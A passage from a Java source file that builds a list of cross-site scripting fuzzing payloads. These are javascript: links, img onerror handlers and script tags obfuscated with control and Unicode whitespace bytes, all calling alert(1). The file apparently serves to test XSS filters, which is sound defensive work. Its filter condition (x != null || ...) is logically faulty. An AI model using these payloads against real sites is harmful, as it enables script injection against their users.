                + "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>\n"
                + "\"`'><script>\\x3Bjavascript:alert(1)</script>\n"
                + "\"`'><script>\\x0Djavascript:alert(1)</script>\n"
                + "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>\n"
                + "\"`'><script>\\x09javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>\n"
                + "\"`'><script>\\x00javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>\n"
                + "\"`'><script>\\x0Cjavascript:alert(1)</script>\n"
                + "\"`'><script>\\x2Bjavascript:alert(1)</script>\n"
                + "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>\n"
                + "\"`'><script>-javascript:alert(1)</script>\n"
                + "\"`'><script>\\x0Ajavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>\n"
                + "\"`'><script>\\x7Ejavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>\n"
                + "\"`'><script>\\xC2\\x85javascript:alert(1)</script>\n"
                + "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>\n"
                + "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>\n"
                + "\"`'><script>\\x21javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>\n"
                + "\"`'><script>\\x0Bjavascript:alert(1)</script>\n"
                + "\"`'><script>\\x20javascript:alert(1)</script>\n"
                + "\"`'><script>\\xC2\\xA0javascript:alert(1)</script>\n"
                + "\"/><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />\n"
                + "\"/><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />\n"
                + "\"/><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />\n"
                + "\"/><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />\n"
                + "\"/><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />\n"
                + "\"/><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />";

        for (String x : payload.split("\n")) {
            if (x != null || !x.equals("")) {
                list.add(x);
            }
        }
        return list;
    }

}
